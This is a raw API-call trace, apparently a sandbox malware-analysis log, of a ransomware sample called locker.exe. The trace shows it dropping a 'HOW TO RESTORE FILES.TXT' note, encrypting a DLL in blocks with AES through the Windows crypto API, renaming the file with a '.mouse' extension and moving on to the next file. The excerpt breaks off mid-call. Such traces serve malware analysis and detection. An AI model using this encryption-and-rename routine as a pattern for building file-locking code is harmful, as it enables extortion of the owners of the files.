HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43ccd8 | out: hHeap=0x3c0000) returned 1 [0197.991] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bd08 [0197.992] AreFileApisANSI () returned 1 [0197.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x42bd08, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0197.992] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x5e) returned 0x3ec7b8 [0197.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x42bd08, cbMultiByte=-1, lpWideCharStr=0x3ec7b8, cchWideChar=47 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\HOW TO RESTORE FILES.TXT") returned 47 [0197.992] GetFileAttributesExW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\HOW TO RESTORE FILES.TXT" (normalized: "c:\\$getcurrent\\safeos\\how to restore files.txt"), fInfoLevelId=0x0, lpFileInformation=0x12afa6c | out: lpFileInformation=0x12afa6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x42bd08, ftLastAccessTime.dwLowDateTime=0x12afa94, ftLastAccessTime.dwHighDateTime=0x363223, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x41f208, nFileSizeHigh=0x70, nFileSizeLow=0x370bb4)) returned 0 [0197.992] GetLastError () returned 0x2 [0197.992] GetLastError () returned 0x2 [0197.992] SetLastError (dwErrCode=0x2) [0197.992] GetLastError () returned 0x2 [0197.992] SetLastError (dwErrCode=0x2) [0197.992] GetLastError () returned 0x2 [0197.992] SetLastError (dwErrCode=0x2) [0197.992] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec7b8 | out: hHeap=0x3c0000) returned 1 [0197.992] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bd08 | out: hHeap=0x3c0000) returned 1 [0197.992] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419d78 [0197.992] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419ca8 [0197.993] AreFileApisANSI () returned 1 [0197.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x42ba30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0197.993] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x5e) returned 0x3ec7b8 [0197.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x42ba30, cbMultiByte=-1, lpWideCharStr=0x3ec7b8, cchWideChar=47 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\HOW TO RESTORE FILES.TXT") returned 47 [0197.993] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\HOW TO RESTORE FILES.TXT" (normalized: "c:\\$getcurrent\\safeos\\how to restore files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x12af930, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3bc [0197.993] GetFileType (hFile=0x3bc) returned 0x1 [0197.993] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec7b8 | out: hHeap=0x3c0000) returned 1 [0197.994] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x1000) returned 0x3f6f08 [0197.994] GetLastError () returned 0x0 [0197.994] SetLastError (dwErrCode=0x0) [0197.994] WriteFile (in: hFile=0x3bc, lpBuffer=0x12ae5c0*, nNumberOfBytesToWrite=0x71, lpNumberOfBytesWritten=0x12ae5b8, lpOverlapped=0x0 | out: lpBuffer=0x12ae5c0*, lpNumberOfBytesWritten=0x12ae5b8*=0x71, lpOverlapped=0x0) returned 1 [0197.995] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3f6f08 | out: hHeap=0x3c0000) returned 1 [0197.995] CloseHandle (hObject=0x3bc) returned 1 [0197.996] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419ca8 | out: hHeap=0x3c0000) returned 1 [0197.996] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419d78 | out: hHeap=0x3c0000) returned 1 [0197.996] GetFileAttributesExW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll"), fInfoLevelId=0x0, lpFileInformation=0x12afa04 | out: lpFileInformation=0x12afa04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9568f13f, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9568f13f, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x232c8)) returned 1 [0197.998] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x60) returned 0x3ec7b8 [0197.998] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc [0197.998] GetFileSize (in: hFile=0x3bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x232c8 [0197.998] CloseHandle (hObject=0x3bc) returned 1 [0197.998] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec7b8 | out: hHeap=0x3c0000) returned 1 [0197.998] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x60) returned 0x3ec7b8 [0197.998] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec7b8 | out: hHeap=0x3c0000) returned 1 [0197.998] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x60) returned 0x3ec7b8 [0197.998] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec7b8 | out: hHeap=0x3c0000) returned 1 [0197.998] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0197.998] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x10) returned 0x43d6f8 [0197.998] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x43d6f8, cchWideChar=7 | out: lpWideCharStr=".mouse") returned 7 [0197.998] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43d6f8 | out: hHeap=0x3c0000) returned 1 [0197.998] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x60) returned 0x3ec7b8 [0197.998] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec7b8 | out: hHeap=0x3c0000) returned 1 [0197.998] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af6fc, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0197.998] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x10) returned 0x43d6f8 [0197.998] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af6fc, cbMultiByte=-1, lpWideCharStr=0x43d6f8, cchWideChar=7 | out: lpWideCharStr=".mouse") returned 7 [0197.998] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43d6f8 | out: hHeap=0x3c0000) returned 1 [0197.998] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x60) returned 0x3ec7b8 [0197.999] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc [0197.999] GetFileSize (in: hFile=0x3bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x232c8 [0197.999] CloseHandle (hObject=0x3bc) returned 1 [0197.999] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec7b8 | out: hHeap=0x3c0000) returned 1 [0197.999] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419de8 [0197.999] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419df8 [0197.999] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x12af564, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3bc [0197.999] GetFileType (hFile=0x3bc) returned 0x1 [0198.000] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x10020) returned 0x445608 [0198.000] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x10020) returned 0x455630 [0198.003] ReadFile (in: hFile=0x3bc, lpBuffer=0x445608, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x12af5d4, lpOverlapped=0x0 | out: lpBuffer=0x445608*, lpNumberOfBytesRead=0x12af5d4*=0x10000, lpOverlapped=0x0) returned 1 [0198.006] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x10000, lpNewFilePointer=0x0, dwMoveMethod=0x12af5bc | out: lpNewFilePointer=0x0) returned 1 [0198.006] ReadFile (in: hFile=0x3bc, lpBuffer=0x455630, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x12af5d4, lpOverlapped=0x0 | out: lpBuffer=0x455630*, lpNumberOfBytesRead=0x12af5d4*=0x10000, lpOverlapped=0x0) returned 1 [0198.008] GetVersion () returned 0x23f00206 [0198.008] CryptAcquireContextA (in: phProv=0x12af6f4, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12af6f4*=0x40aa20) returned 1 [0198.011] CryptImportKey (in: hProv=0x40aa20, pbData=0x12af720, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x12af6f8 | out: phKey=0x12af6f8*=0x432cb8) returned 1 [0198.011] CryptSetKeyParam (hKey=0x432cb8, dwParam=0x4, pbData=0x12af6ec*=0x2, dwFlags=0x0) returned 1 [0198.011] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x420) returned 0x414318 [0198.011] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x414318*, pdwDataLen=0x12af6f0*=0x400, dwBufLen=0x420 | out: pbData=0x414318*, pdwDataLen=0x12af6f0*=0x410) returned 1 [0198.011] CryptDestroyKey (hKey=0x432cb8) returned 1 [0198.011] CryptReleaseContext (hProv=0x40aa20, dwFlags=0x0) returned 1 [0198.012] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12af5bc | out: lpNewFilePointer=0x0) returned 1 [0198.012] GetLastError () returned 0x0 [0198.012] SetLastError (dwErrCode=0x0) [0198.012] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x1000) returned 0x3f6f08 [0198.012] GetLastError () returned 0x0 [0198.012] SetLastError (dwErrCode=0x0) [0198.012] WriteFile (in: hFile=0x3bc, lpBuffer=0x3f6f08*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x12af554, lpOverlapped=0x0 | out: lpBuffer=0x3f6f08*, lpNumberOfBytesWritten=0x12af554*=0x1000, lpOverlapped=0x0) returned 1 [0198.012] WriteFile (in: hFile=0x3bc, lpBuffer=0x4465f8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12af568, lpOverlapped=0x0 | out: lpBuffer=0x4465f8*, lpNumberOfBytesWritten=0x12af568*=0xf000, lpOverlapped=0x0) returned 1 [0198.013] GetLastError () returned 0x0 [0198.013] SetLastError (dwErrCode=0x0) [0198.013] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x414318 | out: hHeap=0x3c0000) returned 1 [0198.013] WriteFile (in: hFile=0x3bc, lpBuffer=0x3f6f08*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x12af574, lpOverlapped=0x0 | out: lpBuffer=0x3f6f08*, lpNumberOfBytesWritten=0x12af574*=0x10, lpOverlapped=0x0) returned 1 [0198.013] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x20000, lpNewFilePointer=0x0, dwMoveMethod=0x12af5bc | out: lpNewFilePointer=0x0) returned 1 [0198.013] ReadFile (in: hFile=0x3bc, lpBuffer=0x455630, nNumberOfBytesToRead=0x3000, lpNumberOfBytesRead=0x12af5d4, lpOverlapped=0x0 | out: lpBuffer=0x455630*, lpNumberOfBytesRead=0x12af5d4*=0x3000, lpOverlapped=0x0) returned 1 [0198.014] ReadFile (in: hFile=0x3bc, lpBuffer=0x3f6f08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12af578, lpOverlapped=0x0 | out: lpBuffer=0x3f6f08*, lpNumberOfBytesRead=0x12af578*=0x2c8, lpOverlapped=0x0) returned 1 [0198.014] GetVersion () returned 0x23f00206 [0198.014] CryptAcquireContextA (in: phProv=0x12af6f4, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12af6f4*=0x40aa20) returned 1 [0198.016] CryptImportKey (in: hProv=0x40aa20, pbData=0x12af720, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x12af6f8 | out: phKey=0x12af6f8*=0x432af8) returned 1 [0198.016] CryptSetKeyParam (hKey=0x432af8, dwParam=0x4, pbData=0x12af6ec*=0x2, dwFlags=0x0) returned 1 [0198.016] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x420) returned 0x3f7f10 [0198.016] CryptEncrypt (in: hKey=0x432af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3f7f10*, pdwDataLen=0x12af6f0*=0x400, dwBufLen=0x420 | out: pbData=0x3f7f10*, pdwDataLen=0x12af6f0*=0x410) returned 1 [0198.017] CryptDestroyKey (hKey=0x432af8) returned 1 [0198.017] CryptReleaseContext (hProv=0x40aa20, dwFlags=0x0) returned 1 [0198.017] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x10010, lpNewFilePointer=0x0, dwMoveMethod=0x12af5bc | out: lpNewFilePointer=0x0) returned 1 [0198.017] GetLastError () returned 0x0 [0198.017] SetLastError (dwErrCode=0x0) [0198.017] WriteFile (in: hFile=0x3bc, lpBuffer=0x445608*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x12af568, lpOverlapped=0x0 | out: lpBuffer=0x445608*, lpNumberOfBytesWritten=0x12af568*=0x10000, lpOverlapped=0x0) returned 1 [0198.017] GetLastError () returned 0x0 [0198.017] SetLastError (dwErrCode=0x0) [0198.017] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3f7f10 | out: hHeap=0x3c0000) returned 1 [0198.018] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x232c8, lpNewFilePointer=0x0, dwMoveMethod=0x12af5bc | out: lpNewFilePointer=0x0) returned 1 [0198.018] GetVersion () returned 0x23f00206 [0198.018] CryptAcquireContextA (in: phProv=0x12af6f4, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12af6f4*=0x40aa20) returned 1 [0198.020] CryptImportKey (in: hProv=0x40aa20, pbData=0x12af720, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x12af6f8 | out: phKey=0x12af6f8*=0x432938) returned 1 [0198.020] CryptSetKeyParam (hKey=0x432938, dwParam=0x4, pbData=0x12af6ec*=0x2, dwFlags=0x0) returned 1 [0198.020] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x420) returned 0x3f7f10 [0198.020] CryptEncrypt (in: hKey=0x432938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3f7f10*, pdwDataLen=0x12af6f0*=0x400, dwBufLen=0x420 | out: pbData=0x3f7f10*, pdwDataLen=0x12af6f0*=0x410) returned 1 [0198.020] CryptDestroyKey (hKey=0x432938) returned 1 [0198.020] CryptReleaseContext (hProv=0x40aa20, dwFlags=0x0) returned 1 [0198.021] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x20010, lpNewFilePointer=0x0, dwMoveMethod=0x12af5bc | out: lpNewFilePointer=0x0) returned 1 [0198.021] GetLastError () returned 0x0 [0198.021] SetLastError (dwErrCode=0x0) [0198.021] WriteFile (in: hFile=0x3bc, lpBuffer=0x445608*, nNumberOfBytesToWrite=0x3000, lpNumberOfBytesWritten=0x12af568, lpOverlapped=0x0 | out: lpBuffer=0x445608*, lpNumberOfBytesWritten=0x12af568*=0x3000, lpOverlapped=0x0) returned 1 [0198.021] GetLastError () returned 0x0 [0198.021] SetLastError (dwErrCode=0x0) [0198.021] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3f7f10 | out: hHeap=0x3c0000) returned 1 [0198.021] WriteFile (in: hFile=0x3bc, lpBuffer=0x3f6f08*, nNumberOfBytesToWrite=0x2c8, lpNumberOfBytesWritten=0x12af62c, lpOverlapped=0x0 | out: lpBuffer=0x3f6f08*, lpNumberOfBytesWritten=0x12af62c*=0x2c8, lpOverlapped=0x0) returned 1 [0198.021] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3f6f08 | out: hHeap=0x3c0000) returned 1 [0198.022] CloseHandle (hObject=0x3bc) returned 1 [0198.066] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x445608 | out: hHeap=0x3c0000) returned 1 [0198.068] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x455630 | out: hHeap=0x3c0000) returned 1 [0198.069] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x60) returned 0x3ec7b8 [0198.070] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af6fc, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0198.070] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x10) returned 0x43d668 [0198.070] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af6fc, cbMultiByte=-1, lpWideCharStr=0x43d668, cchWideChar=7 | out: lpWideCharStr=".mouse") returned 7 [0198.070] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43d668 | out: hHeap=0x3c0000) returned 1 [0198.070] MoveFileExW (lpExistingFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll"), lpNewFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll.mouse" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll.mouse"), dwFlags=0x2) returned 1 [0198.070] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x60) returned 0x3ec820 [0198.071] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll.mouse" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll.mouse"), dwDesiredAccess=0x100, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x3bc [0198.071] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x12af6a4 | out: lpSystemTimeAsFileTime=0x12af6a4) [0198.071] SetFileTime (hFile=0x3bc, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x12af6ec) returned 1 [0198.071] CloseHandle (hObject=0x3bc) returned 1 [0198.071] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec820 | out: hHeap=0x3c0000) returned 1 [0198.071] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec7b8 | out: hHeap=0x3c0000) returned 1 [0198.071] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419df8 | out: hHeap=0x3c0000) returned 1 [0198.071] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419de8 | out: hHeap=0x3c0000) returned 1 [0198.071] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42ba30 | out: hHeap=0x3c0000) returned 1 [0198.071] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43ccb0 | out: hHeap=0x3c0000) returned 1 [0198.071] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b950 | out: hHeap=0x3c0000) returned 1 [0198.071] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cc88 | out: hHeap=0x3c0000) returned 1 [0198.071] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec6e8 | out: hHeap=0x3c0000) returned 1 [0198.071] FindNextFileW (in: hFindFile=0x432df8, lpFindFileData=0x12af88c | out: lpFindFileData=0x12af88c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956819aa, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x956819aa, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x9c, dwReserved0=0x3ec6e8, dwReserved1=0x232c8, cFileName="GetCurrentRollback.ini", cAlternateFileName="")) returned 1 [0198.072] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bbb8 [0198.072] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bbb8 | out: hHeap=0x3c0000) returned 1 [0198.072] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x60) returned 0x3ec6e8 [0198.072] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42be58 [0198.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="GetCurrentRollback.ini", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0198.072] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cb20 [0198.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="GetCurrentRollback.ini", cchWideChar=22, lpMultiByteStr=0x43cb20, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetCurrentRollback.ini", lpUsedDefaultChar=0x0) returned 22 [0198.072] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42be58 | out: hHeap=0x3c0000) returned 1 [0198.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0198.072] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bb80 [0198.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini", cchWideChar=44, lpMultiByteStr=0x42bb80, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini", lpUsedDefaultChar=0x0) returned 44 [0198.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0198.072] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bad8 [0198.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini", cchWideChar=44, lpMultiByteStr=0x42bad8, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini", lpUsedDefaultChar=0x0) returned 44 [0198.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0198.072] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bb10 [0198.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini", cchWideChar=44, lpMultiByteStr=0x42bb10, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini", lpUsedDefaultChar=0x0) returned 44 [0198.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0198.072] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bb48 [0198.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini", cchWideChar=44, lpMultiByteStr=0x42bb48, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini", lpUsedDefaultChar=0x0) returned 44 [0198.072] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bb48 | out: hHeap=0x3c0000) returned 1 [0198.072] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bb10 | out: hHeap=0x3c0000) returned 1 [0198.072] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bad8 | out: hHeap=0x3c0000) returned 1 [0198.073] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bb80 | out: hHeap=0x3c0000) returned 1 [0198.073] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12af9d0, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\locker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\locker.exe")) returned 0x22 [0198.073] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bd78 [0198.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr=".ini", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0198.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr=".ini", cchWideChar=4, lpMultiByteStr=0x12afc3c, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".ini", lpUsedDefaultChar=0x0) returned 4 [0198.073] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bb48 [0198.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 